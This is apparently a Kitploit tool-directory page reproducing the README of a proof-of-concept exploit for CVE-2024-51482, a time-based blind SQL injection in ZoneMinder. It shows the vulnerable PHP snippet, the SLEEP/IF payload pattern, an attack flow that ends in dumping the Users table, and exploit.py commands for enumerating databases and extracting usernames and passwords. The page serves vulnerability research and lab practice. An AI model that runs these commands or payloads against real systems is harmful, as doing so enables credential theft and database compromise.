Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-51482-POC — Time-based SQL injection PoC for CVE-2024-51482 in ZoneMinder, with reproducible Docker lab and automated data extraction. | Kitploit
Tools/GitHubGitHub/0xdaeras/cve-2024-51482-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationDatabase SecurityLabs & Practice
GitHub0xdaeras/cve-2024-51482-poc

CVE-2024-51482-POC

Time-based SQL injection PoC for CVE-2024-51482 in ZoneMinder, with reproducible Docker lab and automated data extraction.

View Repository
7114 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

ZoneMinder Authenticated Time Based SQLi POC - CVE-2024-51482

CVE-1 CVSS Python

⚠️ For educational and authorized security research only. Running this tool against systems you do not own or lack written permission to test is illegal.


Table of Contents

  • ZoneMinder Authenticated Time Based SQLi POC - CVE-2024-51482
    • Table of Contents
    • Overview
    • Vulnerability Details
      • CVE-2024-51482 — Time-Based Blind SQL Injection
      • Root Cause
      • Attack Flow
    • Repository Structure
    • Requirements
    • Installation
      • PoC
      • Docker Lab
    • Usage
      • Default behavior
      • Help screen
      • Commands
      • Output options
      • Flags reference
      • Full Example
      • Notes
      • Docker Lab
    • Example Output
    • Remediation
      • Against this CVE
      • Against similar vulnerabilities
    • Disclosure Timeline
    • References

Overview

This repository contains a time-based SQL injection PoC targeting ZoneMinder.

The tool allows:

  • Vulnerability verification
  • Database enumeration
  • Table and column discovery
  • Full table dumping
  • CSV export

It also includes a fully reproducible Docker lab for safe testing.


Vulnerability Details

CVE-2024-51482 — Time-Based Blind SQL Injection

  • CVE ID: CVE-2024-51482
  • CVSS v3.1 Score: 10.0 (Critical)
  • Vulnerability Type: Time-Based Blind SQL Injection
  • Affected Versions: ZoneMinder v1.37.* <= 1.37.64
  • Attack Vector: Authenticated endpoint (removetag)
  • Impact: Full database disclosure, data integrity compromise
  • Authentication Required: Yes (low-privilege user is sufficient)

Root Cause

ZoneMinder is a free, open source closed-circuit television software application. The vulnerability arises from insufficient input validation in the removetag endpoint of ZoneMinder. User-supplied input is directly incorporated into SQL queries without proper sanitization or parameterization, allowing attackers to inject malicious boolean-based SQL payloads. The exploit leverages:

SLEEP(x - IF(condition, 0, x))

to infer data via response timing.

Full vulnerable code snippet from Github Maintainer Advisory:

case 'removetag' :
    $tagId = $_REQUEST['tid'];
    dbQuery('DELETE FROM Events_Tags WHERE TagId = ? AND EventId = ?', array($tagId, $_REQUEST['id']));
    $sql = "SELECT * FROM Events_Tags WHERE TagId = $tagId";
    $rowCount = dbNumRows($sql);
    if ($rowCount < 1) {
      $sql = 'DELETE FROM Tags WHERE Id = ?';
      $values = array($_REQUEST['tid']);
      $response = dbNumRows($sql, $values);
      ajaxResponse(array('response'=>$response));
    }

Attack Flow

Attacker                              ZoneMinder Web App
   │                                         │
   │  [Auth]                                 │
   │  POST /zm/index.php                     │
   │  {username, password}                   │
   │────────────────────────────────────────►│
   │◄────────────────────────────────────────│
   │  200 OK + Set-Cookie: ZMSESSID=...      │  ← authenticated session
   │                                         │
   │  [CVE-2024-51482]                       │
   │  GET /zm/index.php                      │
   │  ?view=request&request=event            │
   │  &action=removetag&tid=<payload>        │
   │────────────────────────────────────────►│
   │                               SQL boolean query executed
   │                               IF(condition, no delay, SLEEP)
   │◄────────────────────────────────────────│
   │  Delayed response (timing oracle)       │  ← condition inferred
   │                                         │
   │  Repeat requests                        │
   │  ASCII(SUBSTRING(query,pos,1))          │
   │────────────────────────────────────────►│
   │◄────────────────────────────────────────│
   │  Timing differences reveal characters   │
   │                                         │
   │  Binary search per character            │
   │────────────────────────────────────────►│
   │◄────────────────────────────────────────│
   │  Extracted data (1 char at a time)      │
   │                                         │
   │  SELECT Username, Password FROM Users   │
   │────────────────────────────────────────►│
   │◄────────────────────────────────────────│
   │  Full database disclosure               │
   │                                         │
   ✓  Complete data exfiltration via blind SQLi

Repository Structure

CVE-2024-51482/
├── exploit.py
├── README.md
├── requirements.txt
├── docker-compose.yml
├── .env.example
├── docker/
│   ├── Dockerfile
│   └── entrypoint.sh
└── logs/

Requirements

  • Python 3.8+
  • requests
  • Docker and docker-compose (for lab environment)

Installation

PoC

git clone https://github.com/0xDaeras/CVE-2024-51482-POC.git
cd CVE-2024-51482-POC
pip install -r requirements.txt

Docker Lab

git clone https://github.com/0xDaeras/CVE-2024-51482-POC.git
cd CVE-2024-51482-POC
cp .env.example .env  # Configure environment variables
docker compose up -d

Usage

Default behavior

Without any flags, the tool will authenticate to the target, check its vulnerability, and if vulnerable, dump columns ID, Username, Password, Name and Email from the zm.Users table (dump-users command).

python exploit.py -t http://target/zm -u <username> -p <password>

Help screen

python exploit.py -h

Commands

check

Only checks if the target is vulnerable.

python exploit.py -t http://target/zm -u <username> -p <password> check

dump-users

Dumps ID, Username, Password, Name and Email columns from the zm.Users table. Default command if none is specified.

python exploit.py -t http://target/zm -u <username> -p <password> dump-users

list-db

Lists all databases.

python exploit.py -t http://target/zm -u <username> -p <password> list-db

list-tables

Lists tables in a specified database.

python exploit.py -t http://target/zm -u <username> -p <password> list-tables --db <database>

list-columns

Lists columns in a specified table.

python exploit.py -t http://target/zm -u <username> -p <password> list-columns --db <database> --table <table>

dump-table

Dumps all data from a specified table.

python exploit.py -t http://target/zm -u <username> -p <password> dump-table --db <database> --table <table>

You can also specify columns to dump (defaults to all):

python exploit.py -t http://target/zm -u <username> -p <password> dump-table --db <database> --table <table> --columns col1,col2

Output options

Disable terminal output

--no-display

Export to CSV

If the file does not exist, it will be created. If it already exists, new results will be appended.

--outfile results.csv

Flags reference

Download Tool